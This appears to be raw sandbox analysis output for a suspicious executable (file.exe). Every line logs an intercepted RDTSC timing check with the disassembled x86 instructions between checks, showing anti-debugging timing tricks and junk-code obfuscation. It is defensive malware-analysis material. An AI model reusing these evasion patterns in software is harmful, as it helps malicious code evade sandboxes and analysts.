Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B239AB second address: B239B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25EE5 second address: B25EEA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B239B1 second address: B239B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23A62 second address: B23A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2800F second address: B28013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B28013 second address: B28035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823267h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B28035 second address: B2803C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B290C0 second address: B290DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E78823269h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B29338 second address: B29342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5E792621E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B29342 second address: B29346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B29346 second address: B2935D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E792621ECh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3112 second address: AD314C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823262h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5E7882325Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E78823263h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD314C second address: AD315E instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E792621ECh 0x00000008 jl 00007F5E792621E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36C9D second address: B36CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E78823267h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36CCC second address: B36CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jne 00007F5E792621E6h 0x00000019 popad 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36CF8 second address: B36D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E7882325Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36D09 second address: B36D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36D0F second address: B36D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36E00 second address: B36E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jbe 00007F5E792621F7h 0x00000014 push ecx 0x00000015 jmp 00007F5E792621EFh 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36E3A second address: B36E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36FB3 second address: B3700D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F5E792621E6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 ja 00007F5E792621FFh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F5E792621EAh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5E792621F7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3700D second address: B37020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C22C second address: B3C232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C232 second address: B3C237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C237 second address: B3C24B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E792621EEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3AE5E second address: B3AE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E78823256h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3AE6D second address: B3AE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3AE71 second address: B3AE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3AE81 second address: B3AE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B4FF second address: B3B518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5E78823263h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B518 second address: B3B522 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E792621E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B66B second address: B3B671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B671 second address: B3B675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B675 second address: B3B679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B679 second address: B3B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B688 second address: B3B6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F5E78823263h 0x0000000e push eax 0x0000000f jmp 00007F5E78823261h 0x00000014 je 00007F5E78823256h 0x0000001a pop eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B6C0 second address: B3B6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B83A second address: B3B840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B840 second address: B3B85C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F5E792621EAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F5E792621E8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B85C second address: B3B868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5E78823256h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3B868 second address: B3B86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BB19 second address: B3BB2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E7882325Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BB2F second address: B3BB35 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BCE6 second address: B3BCEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BCEA second address: B3BCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BCF2 second address: B3BCF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BCF8 second address: B3BCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3BCFC second address: B3BD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C0E0 second address: B3C0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40466 second address: B4049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E78823256h 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F5E78823267h 0x00000018 jmp 00007F5E7882325Bh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4049C second address: B404A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E792621EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B404A6 second address: B404B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40BDA second address: B40BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40BE0 second address: B40BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40D34 second address: B40D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E792621E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40D3E second address: B40D4A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E78823256h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40D4A second address: B40D89 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E7926220Dh 0x00000008 jmp 00007F5E792621EFh 0x0000000d jmp 00007F5E792621F8h 0x00000012 pushad 0x00000013 jmp 00007F5E792621EDh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B411D5 second address: B411F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E7882325Eh 0x0000000d jne 00007F5E78823256h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B41354 second address: B4135E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4149A second address: B414B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B414B6 second address: B414BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B414BC second address: B414F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Eh 0x00000007 jmp 00007F5E78823261h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007F5E78823266h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF34C1 second address: AF34D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5E792621E8h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF34D1 second address: AF34D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40189 second address: B40193 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E792621E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40193 second address: B4019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4019D second address: B401C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b jng 00007F5E792621EAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B401C6 second address: B401CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15699 second address: B15731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F5E792621F6h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 add dword ptr [ebp+122D2F6Fh], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov dword ptr [ebp+122D2CCEh], esi 0x00000027 mov dword ptr [ebp+1248532Fh], esp 0x0000002d cmp dword ptr [ebp+122D3BB1h], 00000000h 0x00000034 jne 00007F5E792622DFh 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F5E792621E8h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 mov byte ptr [ebp+122D2DD6h], 00000047h 0x0000005b mov dh, ah 0x0000005d mov eax, D49AA7D2h 0x00000062 push 00000000h 0x00000064 push ebp 0x00000065 call 00007F5E792621E8h 0x0000006a pop ebp 0x0000006b mov dword ptr [esp+04h], ebp 0x0000006f add dword ptr [esp+04h], 00000015h 0x00000077 inc ebp 0x00000078 push ebp 0x00000079 ret 0x0000007a pop ebp 0x0000007b ret 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15BE6 second address: B15C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5E78823262h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 566E7051h 0x00000012 pushad 0x00000013 mov ecx, dword ptr [ebp+122D3BF5h] 0x00000019 call 00007F5E7882325Eh 0x0000001e jmp 00007F5E78823267h 0x00000023 pop ecx 0x00000024 popad 0x00000025 call 00007F5E78823259h 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d jno 00007F5E78823256h 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15C46 second address: B15C50 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E792621ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15C50 second address: B15C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E78823269h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15C73 second address: B15C85 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5E792621E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15C85 second address: B15CA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F5E78823261h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15CA8 second address: B15CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15CAE second address: B15CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15E6E second address: B15E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B15E72 second address: B15E94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1666E second address: B1667B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16919 second address: AF34C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+1246E923h], eax 0x00000012 lea eax, dword ptr [ebp+124852D7h] 0x00000018 jmp 00007F5E78823262h 0x0000001d push eax 0x0000001e push ebx 0x0000001f jmp 00007F5E7882325Eh 0x00000024 pop ebx 0x00000025 mov dword ptr [esp], eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007F5E78823258h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 jl 00007F5E78823259h 0x00000048 sub dl, FFFFFFB8h 0x0000004b call dword ptr [ebp+122D1F87h] 0x00000051 pushad 0x00000052 jmp 00007F5E78823265h 0x00000057 push edi 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4557D second address: B45585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4572D second address: B45732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4589A second address: B458B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B458B4 second address: B458C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E7882325Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45B51 second address: B45B6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45B6B second address: B45B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45B73 second address: B45B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45B7B second address: B45B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45E1F second address: B45E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F5E792621F0h 0x0000000f pop edx 0x00000010 jl 00007F5E792621EEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4C060 second address: B4C064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B51E89 second address: B51E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B51E8D second address: B51E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B521EE second address: B521FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
